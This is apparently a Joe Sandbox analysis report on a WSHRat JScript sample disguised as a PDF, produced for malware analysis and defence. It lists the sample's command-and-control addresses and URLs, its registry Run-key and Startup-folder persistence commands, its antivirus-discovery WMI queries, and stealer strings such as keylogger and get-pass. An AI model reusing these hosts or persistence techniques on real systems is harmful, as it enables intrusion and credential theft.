                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895272913.0000020BE1D2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/b
                        Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895073011.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895272913.0000020BE1D2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C11D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: wscript.exe, 00000006.00000003.2074574369.00000221C11D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG
                        Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.
                        Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 94.156.71.108 1604
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 109.248.151.106 5401Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894450811.0000020BE2044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895295189.0000020BE2044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: amsi64_2316.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_3084.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_5428.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_5228.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_6540.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_4108.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_3168.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_3052.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_2108.amsi.csv, type: OTHER
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
                        Source: Yara matchFile source: amsi64_2316.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_3084.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_5428.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_5228.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_6540.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_4108.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_3168.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_3052.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_2108.amsi.csv, type: OTHER
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information42
                        Scripting
                        Valid Accounts11
                        Windows Management Instrumentation
                        42
                        Scripting
                        111
                        Process Injection
                        11
                        Masquerading
                        OS Credential Dumping121
                        Security Software Discovery
                        Remote ServicesData from Local System11
                        Non-Standard Port
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job121
                        Registry Run Keys / Startup Folder
                        121
                        Registry Run Keys / Startup Folder
                        111
                        Process Injection
                        LSASS Memory2
                        File and Directory Discovery
                        Remote Desktop ProtocolData from Removable Media1
                        Remote Access Software
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAt1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        11
                        Obfuscated Files or Information
                        Security Account Manager2
                        System Information Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        DLL Side-Loading
                        NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture12
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428759 Sample: 34003198.pdf.js Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 41 jemyy.theworkpc.com 2->41 47 Sigma detected: Register Wscript In Run Key 2->47 49 Snort IDS alert for network traffic 2->49 51 Found malware configuration 2->51 53 13 other signatures 2->53 8 wscript.exe 2 6 2->8         started        12 wscript.exe 2->12         started        14 wscript.exe 1 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 35 C:\Users\user\AppData\Roaming\bCdHGOcGLp.js, ASCII 8->35 dropped 37 C:\Users\user\AppData\...\34003198.pdf.js, ASCII 8->37 dropped 39 C:\Users\user\AppData\...\34003198.pdf.js, ASCII 8->39 dropped 59 Detected WSHRat 8->59 61 JScript performs obfuscated calls to suspicious functions 8->61 63 Drops script or batch files to the startup folder 8->63 69 3 other signatures 8->69 18 wscript.exe 1 13 8->18         started        23 wscript.exe 26 8->23         started        65 System process connects to network (likely due to code injection or exploit) 12->65 67 Wscript called in batch mode (surpress errors) 12->67 25 wscript.exe 12->25         started        27 wscript.exe 14->27         started        29 wscript.exe 14->29         started        signatures6 process7 dnsIp8 43 jemyy.theworkpc.com 109.248.151.106, 49730, 49732, 49741 DATACLUBLV Russian Federation 18->43 33 C:\Users\user\AppData\...\bCdHGOcGLp.js, ASCII 18->33 dropped 55 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->55 45 94.156.71.108, 1604, 49731, 49733 TERASYST-ASBG Bulgaria 23->45 57 Wscript called in batch mode (surpress errors) 23->57 31 wscript.exe 23->31         started        file9 signatures10 process11

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        jemyy.theworkpc.com
                        109.248.151.106
                        truetrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://94.156.71.108:1604/is-readytrue
                            unknown
                            http://jemyy.theworkpc.com:5401/Vretrue
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://94.156.71.108/&wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://94.156.71.108/BootDevewscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://94.156.71.108:1604/is-readybMwscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://94.156.71.108:1604/is-readyYwscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://94.156.71.108/wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://94.156.71.108:1604/is-readykMwscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://94.156.71.108:1604/is-readyTwscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://94.156.71.108:1604/is-readySwscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://94.156.71.108/3awscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://94.156.71.108/nPrevention_Qwscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://94.156.71.108:1604/is-readymMwscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://94.156.71.108:1604/is-ready;Mwscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://94.156.71.108:1604/is-ready.muiwscript.exe, 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895295189.0000020BE1FDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://94.156.71.108:1604/is-readyBwscript.exe, 00000006.00000003.2074574369.00000221C11C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://94.156.71.108:1604/is-readyngwscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            94.156.71.108
                                                            unknownBulgaria
                                                            31420TERASYST-ASBGtrue
                                                            109.248.151.106
                                                            jemyy.theworkpc.comRussian Federation
                                                            52048DATACLUBLVtrue
                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1428759
                                                            Start date and time:2024-04-19 15:26:53 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 31s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:15
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:34003198.pdf.js
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winJS@17/6@1/2
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .js
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • VT rate limit hit for: 34003198.pdf.js
                                                            TimeTypeDescription
                                                            14:27:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 34003198 wscript.exe //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                                                            14:27:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 34003198 wscript.exe //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                                                            14:28:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js
